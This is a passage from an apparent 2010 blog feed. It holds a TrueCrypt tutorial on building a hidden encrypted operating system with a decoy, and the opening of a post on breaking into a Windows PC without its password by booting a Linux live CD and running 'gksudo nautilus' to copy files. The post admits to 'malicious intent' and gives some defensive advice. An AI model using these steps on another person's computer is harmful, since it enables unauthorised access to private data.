&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Once you&#39;ve got your Windows installation up and running, make sure you&#39;ve downloaded and installed TrueCrypt on your machine. Then fire it up and use the System –&amp;gt; Create Hidden Operating System menu item.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1waCW2Qhwhc8vDmyClTf_MYwC68UjACkEut9WLmyuRrLIOPvaKtgvj6L8-Q-KwyrIezGBGL0oIC8b4sqFa-A82_IK_8NdCDCKFy7eXUjzY-ybKJamu2nSCKq0m17YHpDcI5pDB6l9kfDZ/s1600/4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;139&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1waCW2Qhwhc8vDmyClTf_MYwC68UjACkEut9WLmyuRrLIOPvaKtgvj6L8-Q-KwyrIezGBGL0oIC8b4sqFa-A82_IK_8NdCDCKFy7eXUjzY-ybKJamu2nSCKq0m17YHpDcI5pDB6l9kfDZ/s320/4.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;This will pop up a wizard that will help create the new TrueCrypt volume  to house the hidden operating system, which will live inside of a  hidden volume on the secondary partition. Your best bet the first time  around is to just choose Single-boot—leave the multi-boot for the  advanced class.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4SIgzVwFaNehoRO9MeSrU4NyuxFird6W73eq96PJlgMFj9eZJe2EWMw7MBuJSaW2_Nfo_cTc3vUy0hXUqvFRkjaBkFUoXLNV4SnShNG9s_WZIDqiItbgnWjx6S8m_nf7kB1vW-XpIF0vI/s1600/5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;161&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4SIgzVwFaNehoRO9MeSrU4NyuxFird6W73eq96PJlgMFj9eZJe2EWMw7MBuJSaW2_Nfo_cTc3vUy0hXUqvFRkjaBkFUoXLNV4SnShNG9s_WZIDqiItbgnWjx6S8m_nf7kB1vW-XpIF0vI/s320/5.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;The Volume Encryption options page is important for one primary reason,  namely that you need to choose the same encryption method across the  board while you&#39;re running through this process. You&#39;ll be prompted a  number of times to choose the encryption, and you need to always choose  the same one or else you can&#39;t boot or access your data—also, the  default setting of AES encryption is much, much faster than any other  option.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlveJDLucQmx5FBGdACFQreS0pOvYoC_sovNfOr1KZVFffu1qt-cbbU7-19egp5pZTjMvWv4t2lumbDu6d_tV0eOKYV64efF6nj-2iMVJjY4UvwLHZOopR96xZD7uLelyh37xblqS_Eixk/s1600/6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;186&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlveJDLucQmx5FBGdACFQreS0pOvYoC_sovNfOr1KZVFffu1qt-cbbU7-19egp5pZTjMvWv4t2lumbDu6d_tV0eOKYV64efF6nj-2iMVJjY4UvwLHZOopR96xZD7uLelyh37xblqS_Eixk/s320/6.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;You&#39;ll be prompted to choose the outer volume password, which will house  a set of decoy files to make people believe that your TrueCrypt volume  on the second partition contains nothing more than a bunch of files you  don&#39;t want people to see—except the files you put on the outer volume  aren&#39;t actually meant to be a secret. Make sure you don&#39;t lose this  password.&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimZaK0SeUbAyX5zwkQVE8smhToTeNFNUl9Sh7KMo5tWgYZ9PrsLnOw8Rr8W8i7pQhJBognDlpVmFn5-uZyzMRhvtm5WFB1e7cT_lNdUOXVo92CxNbEyx-i6VbkR6mP4tQWbX2Ibq6dX1aE/s1600/7.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimZaK0SeUbAyX5zwkQVE8smhToTeNFNUl9Sh7KMo5tWgYZ9PrsLnOw8Rr8W8i7pQhJBognDlpVmFn5-uZyzMRhvtm5WFB1e7cT_lNdUOXVo92CxNbEyx-i6VbkR6mP4tQWbX2Ibq6dX1aE/s320/7.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&amp;nbsp;Next you&#39;ll be asked whether or not you want to store large files on the  TrueCrypt outer volume. This choice is up to you, but there&#39;s probably  no reason to choose yes here.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpml2K6Nnkqc1qJvReTOx7KzA95Ofl3FFdiI6cwf2uYIdDy5MNMFihPWsC0Y8Q1lbnq3LvnXW2gAPvZUJ75isbaKsHjW_cx2XD87ZEJBOVb6zv3IqFdO3Ut5JCw9sERmPVCvp3QKkyfXEM/s1600/8.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;124&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpml2K6Nnkqc1qJvReTOx7KzA95Ofl3FFdiI6cwf2uYIdDy5MNMFihPWsC0Y8Q1lbnq3LvnXW2gAPvZUJ75isbaKsHjW_cx2XD87ZEJBOVb6zv3IqFdO3Ut5JCw9sERmPVCvp3QKkyfXEM/s320/8.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Once the outer volume is created, you&#39;ll be prompted to put some files  there to make sure it looks like a real drive in case you&#39;re asked to  open your TrueCrypt volume.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTJnCN_VAog-jT1RirEBc9TOXyI_cV1iMoCWiL5-9OqVvFkJtEi1rbb8ylYRZ0ORwMePjDTqpRP3d66V5umj7snoDjykV8bwmEWFn2CzoQ0QS3mo0LN3py_0u6XDhPIQhOQhTPTFc9lZH/s1600/9.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;124&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTJnCN_VAog-jT1RirEBc9TOXyI_cV1iMoCWiL5-9OqVvFkJtEi1rbb8ylYRZ0ORwMePjDTqpRP3d66V5umj7snoDjykV8bwmEWFn2CzoQ0QS3mo0LN3py_0u6XDhPIQhOQhTPTFc9lZH/s320/9.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Next you&#39;ll be asked to create a password for the hidden volume, which  will contain the hidden operating system. It&#39;s crucially important that  you choose a different password here, make sure it&#39;s difficult, and make  sure that you don&#39;t forget it.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq3MX7I2RE9c9IFzp3UE_ttgYRGExgiteZ1EXyzloG0FPkU44cvTCh_dOE0kTZcrtiqvWW5bJROz6b8BIQoBuNxnTenwj_CkPKGKC_GaIiCOyU1ZXCQBqp0eKdu_MNc5GHRddgsthHwXA9/s1600/10.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq3MX7I2RE9c9IFzp3UE_ttgYRGExgiteZ1EXyzloG0FPkU44cvTCh_dOE0kTZcrtiqvWW5bJROz6b8BIQoBuNxnTenwj_CkPKGKC_GaIiCOyU1ZXCQBqp0eKdu_MNc5GHRddgsthHwXA9/s320/10.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;At this step you&#39;ll be asked to reboot your PC and re-enter the password  for the hidden operating system. Your new hidden OS will be copied from  your primary operating system and encrypted into your newly created  hidden volume. Readers should note that this process can take an  extremely long time—you&#39;ll want to let this run overnight.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisXGuEfk3MryGNhY3BvXiMbLd5LTyZZ6lBq6mhPJM8ontc8H5qke52YVeQDmWM43mrr7-JfhebCI3AXL5Rt9PiqVi2pWdQvu07Tj_3gNopdL9j3sJE7bNVryzv0nIJFxa6M0nd2MfqalZ-/s1600/11.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;120&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisXGuEfk3MryGNhY3BvXiMbLd5LTyZZ6lBq6mhPJM8ontc8H5qke52YVeQDmWM43mrr7-JfhebCI3AXL5Rt9PiqVi2pWdQvu07Tj_3gNopdL9j3sJE7bNVryzv0nIJFxa6M0nd2MfqalZ-/s320/11.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Once the hidden operating system has been created, you&#39;ll be able to  boot directly into it by using the hidden password, and then you&#39;ll be  prompted to wipe the original system off the first partition. This  process can also take a few hours, so go do something else while it&#39;s  running.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiomZ9AHrwLVm6nZt_JbEPx3Z1ZsqTOCyK6ntKZTD_OSza6Ma-K6_TYkuMxS5XMwgVYX7OwXCouc17YLtnvsR4aWM191Iy3WrB9iljaK2QX7gyOHoILK_8LpSJgWwrbQ7OjLe1LBXQB6wGH/s1600/12.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;108&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiomZ9AHrwLVm6nZt_JbEPx3Z1ZsqTOCyK6ntKZTD_OSza6Ma-K6_TYkuMxS5XMwgVYX7OwXCouc17YLtnvsR4aWM191Iy3WrB9iljaK2QX7gyOHoILK_8LpSJgWwrbQ7OjLe1LBXQB6wGH/s320/12.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;At this point you&#39;ll have a hidden operating system, accessible by using  the hidden password. The outer volume password won&#39;t do anything, and  hitting Esc at the TrueCrypt boot loader screen will take you to a page  saying there&#39;s no bootable operating system.When you boot into your hidden operating system, you&#39;ll notice that you  still see two drives, and the C: drive appears to be the same as it was  before, but it&#39;s actually living in the encrypted volume, which is on  the second drive that you aren&#39;t able to access. Whatever you do, leave  that second drive alone-don&#39;t try to use partition tools to reformat or anything else. &lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Install the Decoy OS&lt;/h3&gt;Naturally, creating a hidden operating system isn&#39;t very useful  unless you also have a decoy OS to show off to somebody that might be  looking at your PC—they will simply assume that you used TrueCrypt to  encrypt your drive, not that you also have a hidden operating system.&lt;br /&gt;
Just drop the Windows installation disk into your drive, and install a  fresh copy—but make absolutely certain that you install onto the first  partition on the drive and not on top of your encrypted OS.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0O_pM0iGrb1Y-HBxc_k8aCMclyqmbjHK2Lhv7lqeE-VLvtmcMks-mArkWybrb7JS2tE22RW218lg635fKNhyphenhyphenXFrLqrMKltVfGardVciiIJ9HU7RCy0JEIPQSAW595zRjAK_nNoix5wb8k/s1600/13.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0O_pM0iGrb1Y-HBxc_k8aCMclyqmbjHK2Lhv7lqeE-VLvtmcMks-mArkWybrb7JS2tE22RW218lg635fKNhyphenhyphenXFrLqrMKltVfGardVciiIJ9HU7RCy0JEIPQSAW595zRjAK_nNoix5wb8k/s320/13.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;Once you&#39;ve installed Windows again, the TrueCrypt boot loader will be  wiped out, but don&#39;t worry, you&#39;ll just need to download and install  TrueCrypt inside the decoy operating system, and then use System –&amp;gt;  Encrypt System Partition/Drive to encrypt the decoy OS as well. During  this process, you&#39;ll be asked to pick the password for the decoy  operating system, and you&#39;ll want to make sure you save this one as  well.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWjYtIMqLzEd-cVJNj7YCrpwqyEZxhXPrOBvFmkHLvQ36_fubnawcN4kAZMzdYfE2eYeFJ6V8kSVfqRQ-QAiQU-a5YWMAx-U3gj3jy_G4AqqHvCHSLiWiwLjvA9azts_TIp9WrZRQsmShD/s1600/14.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;107&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWjYtIMqLzEd-cVJNj7YCrpwqyEZxhXPrOBvFmkHLvQ36_fubnawcN4kAZMzdYfE2eYeFJ6V8kSVfqRQ-QAiQU-a5YWMAx-U3gj3jy_G4AqqHvCHSLiWiwLjvA9azts_TIp9WrZRQsmShD/s320/14.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Make sure this time that you select the Normal option on the wizard, and  when prompted, choose the same encryption version as you did before.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho4UPOCoX_lVxwPhGzmAssHMFqvmEQl3PsJ-TCY9RRzV0BKy_shIp9CltNBOcIZKMW6yHjazXRsT4PjUSY67GhhFsAIymDkaVq7OaZ0kBi3F440Bq5avpVonEsF6HGEqByUARAoziZYoR3/s1600/15.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;135&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho4UPOCoX_lVxwPhGzmAssHMFqvmEQl3PsJ-TCY9RRzV0BKy_shIp9CltNBOcIZKMW6yHjazXRsT4PjUSY67GhhFsAIymDkaVq7OaZ0kBi3F440Bq5avpVonEsF6HGEqByUARAoziZYoR3/s320/15.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Choose to encrypt just the Windows system partition (see screenshot  below), which in this case is the first partition on the drive that  houses the decoy operating system. If you choose to encrypt the whole  drive here, it&#39;s going to break your hidden operating system.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMrvDCwCouTPFu8FLe1WKD43f4dZqq0qg5f3YSF9Dub2lEUOyg3AQXM1j6PCKhr9QzT-RfmZRIA3t2ACZigPuGCuZzCGzDyBIpAqdQMhlhJCoygtAKAfRWgBpRgQxbznLhM6nJ4EO8XI9/s1600/16.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;146&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMrvDCwCouTPFu8FLe1WKD43f4dZqq0qg5f3YSF9Dub2lEUOyg3AQXM1j6PCKhr9QzT-RfmZRIA3t2ACZigPuGCuZzCGzDyBIpAqdQMhlhJCoygtAKAfRWgBpRgQxbznLhM6nJ4EO8XI9/s320/16.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Below is the one screen in the wizard that might throw you for a loop:  You are required to create a rescue disk and burn it to CD or DVD using  TrueCrypt&#39;s wizard. While you should absolutely create the rescue disk,  if you are having problems burning it off this particular PC and decided  to burn the disc using another PC instead, you can simply save the ISO  image to your hard drive and then use an ISO mounting software to mount  the disk. Either way, you can proceed through the wizard once the rescue  disk is in the drive.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwd0AaXKo2-kwCxQ4l6LglCfOJo9suK6E9FXcCNzyYdYxGpPdxq65fb34WmtIIzcTNyGmcjfgDN2RILq_r3ZWx3zt78LwoUeIEB1tmhHccfWWAZ1TJthb0fdlUA5CdpNhG-dvSqtb-aq8b/s1600/17.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;232&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwd0AaXKo2-kwCxQ4l6LglCfOJo9suK6E9FXcCNzyYdYxGpPdxq65fb34WmtIIzcTNyGmcjfgDN2RILq_r3ZWx3zt78LwoUeIEB1tmhHccfWWAZ1TJthb0fdlUA5CdpNhG-dvSqtb-aq8b/s320/17.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Once the wizard is complete, you&#39;ll need wait while the drive is  encrypted, which will take a few more hours. Once it&#39;s done, you&#39;ll have  a hidden operating system, and a decoy to throw people off your trail. &lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Using Your Decoy or Hidden Operating Systems&lt;/h3&gt;When you reboot your computer, you&#39;ll see the TrueCrypt boot loader  screen, where you can type in one of two passwords. If you use the  Hidden password, you&#39;ll be able to access your hidden Windows install,  and if you use the Decoy password, naturally, you&#39;ll be able to access  the decoy operating system.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH7htbM_yJRq47CyTjzQGbZInEnEBwPCfhdhe-GL-vQ8vspxBs0l2EeBoLXYRL0i_jwWivoPQvZov8TlGp5EfNQe8nAvgM4lqmDoiWDGrO2pylAYBJn1WMEbWH265pgo6t5eJyD3Avjgkf/s1600/18.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;114&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH7htbM_yJRq47CyTjzQGbZInEnEBwPCfhdhe-GL-vQ8vspxBs0l2EeBoLXYRL0i_jwWivoPQvZov8TlGp5EfNQe8nAvgM4lqmDoiWDGrO2pylAYBJn1WMEbWH265pgo6t5eJyD3Avjgkf/s320/18.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
If you have booted into the decoy operating system, you can access the  outer volume sitting on the secondary partition to &quot;prove&quot; to somebody  that it&#39;s nothing more than a TrueCrypt drive—just use the outer volume  password when you mount the volume using TrueCrypt, which will do  nothing more than show off the sample files you added in a previous  step.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8QtT72EUS4TE41hb1NDnoppTTdC2B2r30JuHnBrXvM4bsb6qKQ336t6v3ZlebmRixmtQD-jSdHQ9dnyd1A8_QHBvenqcnfPSF80e5_1HuCYVGxxIq0p4yBhYlgNmbVb20k-9cSTa_zu7/s1600/19.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;92&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8QtT72EUS4TE41hb1NDnoppTTdC2B2r30JuHnBrXvM4bsb6qKQ336t6v3ZlebmRixmtQD-jSdHQ9dnyd1A8_QHBvenqcnfPSF80e5_1HuCYVGxxIq0p4yBhYlgNmbVb20k-9cSTa_zu7/s320/19.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
And after all that, you&#39;ve got a completely encrypted, completely hidden  operating system. It&#39;s a complex, time-consuming process, to be sure,  but if you regularly have sensitive data on your machine, you&#39;re a  card-holding member of the tin-foil hat club, or you just like your  privacy, it does the job nicely.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/11/how-to-encrypt-and-hide-your-entire.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9Jf5FP9wWJn0tiTykOBhpNw0qcogNR0n79YBWJLK7cJ0DSY8rb8-L0lDLZCmueRsMEuYkuXhQgpXbb2ZadBAMO252ARy6d1kQNpAYIqXxlT4cWBs5hq7MuUFKzoqpnvFC_Wi12KZ4CC_/s72-c/1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7438707049543023055</guid><pubDate>Sun, 14 Nov 2010 07:26:00 +0000</pubDate><atom:updated>2010-11-14T12:57:24.558+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>How to Break into a Windows PC And Prevent It from Happening to You</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3RcnJsEJDp_wBlCPk_si6ml0f_GfyQ0mU8PA4qN9Q_bEzj9OBvNb446EoCHzfR-uz_TVFTKH4A03a5fzVBt5sLcbXRhavLe3eD0X5jcO5zrx-_wli86KSmAdoG3TJj2n2zAoJuEabNmIf/s1600/dsc_0005.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;192&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3RcnJsEJDp_wBlCPk_si6ml0f_GfyQ0mU8PA4qN9Q_bEzj9OBvNb446EoCHzfR-uz_TVFTKH4A03a5fzVBt5sLcbXRhavLe3eD0X5jcO5zrx-_wli86KSmAdoG3TJj2n2zAoJuEabNmIf/s320/dsc_0005.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Whether you&#39;ve forgotten your password or you have a more malicious  intent, it&#39;s actually extremely easy to break into a Windows computer  without knowing the password. Here&#39;s how to do it, and how to prevent  others from doing the same to you.  &lt;br /&gt;
There are a few methods to  breaking into a computer, each with their own strengths and weaknesses.  We&#39;ll go through three of the best and most common methods, and nail  down their shortcomings so you know which one to use—and how to exploit  their weaknesses to keep your own computer secure.&lt;br /&gt;
&lt;h1&gt;&lt;a href=&quot;http://www.blogger.com/post-create.g?blogID=3484615790471358750&quot; id=&quot;lazymethod&quot; name=&quot;lazymethod&quot;&gt;&lt;/a&gt;&amp;nbsp;&lt;/h1&gt;&lt;h1&gt;The Lazy Method: Use a Linux Live CD to Get at the Files&lt;/h1&gt;If you don&#39;t need access to the OS itself, just a few files, you  don&#39;t need to go through much trouble at all. You can grab any Linux  live CD and just drag-and drop files onto a USB hard drive, as you would  in any other OS.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN0pxxHpXYKm-aG0onKH6PvhKwpedzbdQnwSpEoRZibIjFVXoSQvrAEbGOdx0Pvvqo-NZrKvMKiQDq2290orOSsdBP25fsua0ZFqiXrA3R8mfHpCxVG1C1zbcg-a0_QeQcxG3alf3TC6jX/s1600/2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;189&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN0pxxHpXYKm-aG0onKH6PvhKwpedzbdQnwSpEoRZibIjFVXoSQvrAEbGOdx0Pvvqo-NZrKvMKiQDq2290orOSsdBP25fsua0ZFqiXrA3R8mfHpCxVG1C1zbcg-a0_QeQcxG3alf3TC6jX/s320/2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Just download the live .iso file for any Linux distribution (like the Ubuntu&lt;a href=&quot;http://www.ubuntu.com/&quot;&gt;&lt;/a&gt;)  and burn it to CD. Stick it in the computer you want to access and boot  up from that CD. Pick &quot;Try Ubuntu&quot; when it comes up with the first  menu, and it should take you right into a desktop environment. From  here, you can access most of the hard drive just by going to the Places  menu in the menu bar and choosing the Windows drive. It should see any  NTFS drives just fine.&lt;br /&gt;
Note that depending on the permissions of some files, you might need  root access. If you&#39;re having trouble viewing or copying some files,  open up a terminal window (by going to Applications &amp;gt; Accessories  &amp;gt; Terminal) and type in &lt;code&gt;gksudo nautilus&lt;/code&gt;, leaving the password blank when prompted. You should now have access to everything.&lt;br /&gt;
&lt;h2&gt;How to Beat It&lt;/h2&gt;This method can give you access to the file system, but its main  weakness is that the malicious user still can&#39;t access any encrypted  files, even when using &lt;code&gt;gksudo&lt;/code&gt;. So, if the owner of the computer (or you) has encrypted their files, you won&#39;t get very far.&lt;br /&gt;
&lt;h1&gt;&amp;nbsp;&lt;/h1&gt;&lt;h1&gt;Sneaky Command-Line Fu: Reset the Password with the System Rescue CD&lt;/h1&gt;If you need access to the operating system itself, the Linux-based  System Rescue CD is a good option for breaking in. You&#39;ll need to do a  bit of command line work, but as long as you follow the instructions  closely you should be fine.&lt;br /&gt;
